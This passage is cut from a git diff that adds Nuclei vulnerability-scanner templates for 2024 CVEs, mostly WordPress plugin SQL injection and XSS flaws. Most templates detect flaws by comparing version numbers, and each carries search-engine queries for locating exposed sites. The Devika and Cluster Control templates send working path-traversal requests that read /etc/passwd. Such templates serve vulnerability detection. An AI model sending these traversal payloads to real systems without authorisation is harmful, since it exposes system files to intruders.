preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51fd6124-4954-4827-a665-c2d94d74a512?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-39653 + metadata: + fofa-query: "wp-content/plugins/vikrentcar/" + google-query: inurl:"/wp-content/plugins/vikrentcar/" + shodan-query: 'vuln:CVE-2024-39653' + tags: cve,wordpress,wp-plugin,vikrentcar,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/vikrentcar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "vikrentcar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39655.yaml b/nuclei-templates/CVE-2024/CVE-2024-39655.yaml new file mode 100644 index 0000000000..b2594d64da --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39655.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39655 + +info: + name: > + LiquidPoll – Advanced Polls for Creators and Brands <= 3.3.77 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The LiquidPoll – Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via poll comments in all versions up to, and including, 3.3.77 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3a993fb-cec5-4a36-9f92-3defff0ab11b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-39655 + metadata: + fofa-query: "wp-content/plugins/wp-poll/" + google-query: inurl:"/wp-content/plugins/wp-poll/" + shodan-query: 'vuln:CVE-2024-39655' + tags: cve,wordpress,wp-plugin,wp-poll,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-poll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-poll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.77') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39656.yaml b/nuclei-templates/CVE-2024/CVE-2024-39656.yaml new file mode 100644 index 0000000000..3f38f6db3d --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39656.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39656 + +info: + name: > + Tin Canny Reporting for LearnDash <= 4.3.0.7 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Tin Canny Reporting for LearnDash plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 4.3.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/634c1e9d-85ba-4860-a3e4-a65bf3f23919?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-39656 + metadata: + fofa-query: "wp-content/plugins/tin-canny-learndash-reporting/" + google-query: inurl:"/wp-content/plugins/tin-canny-learndash-reporting/" + shodan-query: 'vuln:CVE-2024-39656' + tags: cve,wordpress,wp-plugin,tin-canny-learndash-reporting,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tin-canny-learndash-reporting/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tin-canny-learndash-reporting" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.0.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39658.yaml b/nuclei-templates/CVE-2024/CVE-2024-39658.yaml new file mode 100644 index 0000000000..2eaec28d3e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39658.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39658 + +info: + name: > + Salon booking system <= 10.7 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The Salon booking system plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in versions up to, and including, 10.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5b74a84-e418-4bd4-b36e-5bd4ba5197c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-39658 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-39658' + tags: cve,wordpress,wp-plugin,salon-booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39659.yaml b/nuclei-templates/CVE-2024/CVE-2024-39659.yaml new file mode 100644 index 0000000000..73422ec99c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39659.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39659 + +info: + name: > + WP-PostRatings <= 1.91.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP-PostRatings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Google rich text snippets in versions up to, and including, 1.91.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/11dbc647-fa96-4c63-8f13-0c8ea6f33919?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39659 + metadata: + fofa-query: "wp-content/plugins/wp-postratings/" + google-query: inurl:"/wp-content/plugins/wp-postratings/" + shodan-query: 'vuln:CVE-2024-39659' + tags: cve,wordpress,wp-plugin,wp-postratings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-postratings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-postratings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.91.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39660.yaml b/nuclei-templates/CVE-2024/CVE-2024-39660.yaml new file mode 100644 index 0000000000..bce20e4b05 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39660.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39660 + +info: + name: > + Photo Engine <= 6.3.1 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Photo Engine plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/00a7768f-5fd6-49ff-bcd6-e44dd59ae8d9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39660 + metadata: + fofa-query: "wp-content/plugins/wplr-sync/" + google-query: inurl:"/wp-content/plugins/wplr-sync/" + shodan-query: 'vuln:CVE-2024-39660' + tags: cve,wordpress,wp-plugin,wplr-sync,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wplr-sync/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wplr-sync" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39661.yaml b/nuclei-templates/CVE-2024/CVE-2024-39661.yaml new file mode 100644 index 0000000000..e4ab02e7af --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39661.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39661 + +info: + name: > + Kubio AI Page Builder <= 2.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Kubio AI Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading Block in versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6adf6f3b-aff0-4495-92a4-13855dac5030?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39661 + metadata: + fofa-query: "wp-content/plugins/kubio/" + google-query: inurl:"/wp-content/plugins/kubio/" + shodan-query: 'vuln:CVE-2024-39661' + tags: cve,wordpress,wp-plugin,kubio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kubio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kubio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39663.yaml b/nuclei-templates/CVE-2024/CVE-2024-39663.yaml new file mode 100644 index 0000000000..71f69fbe43 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39663.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39663 + +info: + name: > + WP Fast Total Search <= 1.68.232 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The WP Fast Total Search – The Power of Indexed Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.68.232 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/12fe64ad-2998-4f41-b8d7-aa5921b0d0d9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-39663 + metadata: + fofa-query: "wp-content/plugins/fulltext-search/" + google-query: inurl:"/wp-content/plugins/fulltext-search/" + shodan-query: 'vuln:CVE-2024-39663' + tags: cve,wordpress,wp-plugin,fulltext-search,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fulltext-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fulltext-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.68.232') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39664.yaml b/nuclei-templates/CVE-2024/CVE-2024-39664.yaml new file mode 100644 index 0000000000..e6240ba94f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39664.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39664 + +info: + name: > + Filter & Grids <= 2.8.33 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Filter & Grids plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.33. This is due to missing or incorrect nonce validation on the ymc_updated_posts function. This makes it possible for unauthenticated attackers to trigger a request to fetch updated posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac799e11-2f7b-43c2-88da-e77c075a958f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-39664 + metadata: + fofa-query: "wp-content/plugins/ymc-smart-filter/" + google-query: inurl:"/wp-content/plugins/ymc-smart-filter/" + shodan-query: 'vuln:CVE-2024-39664' + tags: cve,wordpress,wp-plugin,ymc-smart-filter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ymc-smart-filter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ymc-smart-filter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.33') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39665.yaml b/nuclei-templates/CVE-2024/CVE-2024-39665.yaml new file mode 100644 index 0000000000..9a7a67db3e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39665.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39665 + +info: + name: > + Filter & Grids <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The Filter & Grids plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c59195f5-bb77-4f96-bd5e-b871d663ccce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39665 + metadata: + fofa-query: "wp-content/plugins/ymc-smart-filter/" + google-query: inurl:"/wp-content/plugins/ymc-smart-filter/" + shodan-query: 'vuln:CVE-2024-39665' + tags: cve,wordpress,wp-plugin,ymc-smart-filter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ymc-smart-filter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ymc-smart-filter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39668.yaml b/nuclei-templates/CVE-2024/CVE-2024-39668.yaml new file mode 100644 index 0000000000..8023b54926 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39668.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39668 + +info: + name: > + Extensions for Elementor <= 2.0.31 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5bea454e-bd1a-4cdf-acec-7bf15f6a6cda?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39668 + metadata: + fofa-query: "wp-content/plugins/extensions-for-elementor/" + google-query: inurl:"/wp-content/plugins/extensions-for-elementor/" + shodan-query: 'vuln:CVE-2024-39668' + tags: cve,wordpress,wp-plugin,extensions-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/extensions-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "extensions-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.31') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-40422.yaml b/nuclei-templates/CVE-2024/CVE-2024-40422.yaml new file mode 100644 index 0000000000..450fad8d83 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-40422.yaml @@ -0,0 +1,66 @@ +id: CVE-2024-40422 + +info: + name: Devika v1 - Path Traversal + author: securityforeveryone,alpernae + severity: critical + description: | + The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-40422 + - https://cvefeed.io/vuln/detail/CVE-2024-40422 + - https://github.com/alpernae/CVE-2024-40422 + - https://github.com/stitionai/devika + - https://www.exploit-db.com/exploits/52066 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-40422 + cwe-id: CWE-22 + epss-score: 0.0087 + epss-percentile: 0.82513 + cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: stitionai + product: devika + fofa-query: icon_hash="-1429839495" + tags: cve,cve2024,devika,lfi + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /api/data HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"models","projects","OPENAI","OLLAMA")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - 'application/octet-stream' + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2024/CVE-2024-41628.yaml b/nuclei-templates/CVE-2024/CVE-2024-41628.yaml new file mode 100644 index 0000000000..9ad8bc555a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-41628.yaml @@ -0,0 +1,61 @@ +id: CVE-2024-41628 + +info: + name: Cluster Control CMON API - Directory Traversal + author: securityforeveryone + severity: high + description: | + Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API. + reference: + - https://cvefeed.io/vuln/detail/CVE-2024-41628 + - https://github.com/Redshift-CyberSecurity/CVE-2024-41628 + - https://vuldb.com/?id.272533 + - https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-41628 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-41628 + cwe-id: CWE-22 + epss-score: 0.00045 + epss-percentile: 0.1555 + cpe: cpe:2.3:a:severalnines:clustercontrol:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: severalnines + product: cluster_control + fofa-query: icon_hash="160707013" || icon_hash="-1815707560" + tags: cve,cve2024,severalnines,cluster-control,lfi + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"ClusterControl","CMON_API")' + - 'contains(content_type,"text/html")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /../../../../../../../../..//etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: status + status: + - 200 +# digest: 4a0a0047304502210087c3932b04bdbe006b7eefff8966f21f6dd854e5b2b9f0b403af9ca2ad1b8452022014abfe4d46c5fc7dccb7d0602242a09add132dcad91f5c4cdb8a18fcc5eb6e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5057.yaml b/nuclei-templates/CVE-2024/CVE-2024-5057.yaml new file mode 100644 index 0000000000..c509bd713b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5057.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5057 + +info: + name: > + Easy Digital Downloads <= 3.2.12 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Easy Digital Downloads plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.2.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/20fdbe6b-45a8-41f4-8dde-35a0f9ea04a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-5057 + metadata: + fofa-query: "wp-content/plugins/easy-digital-downloads/" + google-query: inurl:"/wp-content/plugins/easy-digital-downloads/" + shodan-query: 'vuln:CVE-2024-5057' + tags: cve,wordpress,wp-plugin,easy-digital-downloads,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-digital-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-digital-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.12') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5226.yaml b/nuclei-templates/CVE-2024/CVE-2024-5226.yaml new file mode 100644 index 0000000000..e6bce7a0ac --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5226.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5226 + +info: + name: > + Fuse Social Floating Sidebar <= 5.4.10 - Authenticated (Author+) Stored Cross-Site Scripting via File Upload + author: topscoder + severity: low + description: > + The Fuse Social Floating Sidebar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the file upload functionality in all versions up to, and including, 5.4.10 due to insufficient validation of SVG files. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a3137a1-8e46-44c6-8edd-ad9fc4d66e0b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5226 + metadata: + fofa-query: "wp-content/plugins/fuse-social-floating-sidebar/" + google-query: inurl:"/wp-content/plugins/fuse-social-floating-sidebar/" + shodan-query: 'vuln:CVE-2024-5226' + tags: cve,wordpress,wp-plugin,fuse-social-floating-sidebar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fuse-social-floating-sidebar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fuse-social-floating-sidebar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.10') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5668.yaml b/nuclei-templates/CVE-2024/CVE-2024-5668.yaml new file mode 100644 index 0000000000..e0e452d2d7 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5668.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5668 + +info: + name: > + Lightbox & Modal Popup WordPress Plugin – FooBox <= 2.7.28 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via HTML Data Attributes + author: topscoder + severity: low + description: > + The Lightbox & Modal Popup WordPress Plugin – FooBox plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 2.7.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5668 + metadata: + fofa-query: "wp-content/plugins/foobox-image-lightbox/" + google-query: inurl:"/wp-content/plugins/foobox-image-lightbox/" + shodan-query: 'vuln:CVE-2024-5668' + tags: cve,wordpress,wp-plugin,foobox-image-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/foobox-image-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "foobox-image-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.28') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-5975.yaml b/nuclei-templates/CVE-2024/CVE-2024-5975.yaml new file mode 100644 index 0000000000..4d7aacf0be --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-5975.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-5975 + +info: + name: CZ Loan Management <= 1.1 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5975 + - 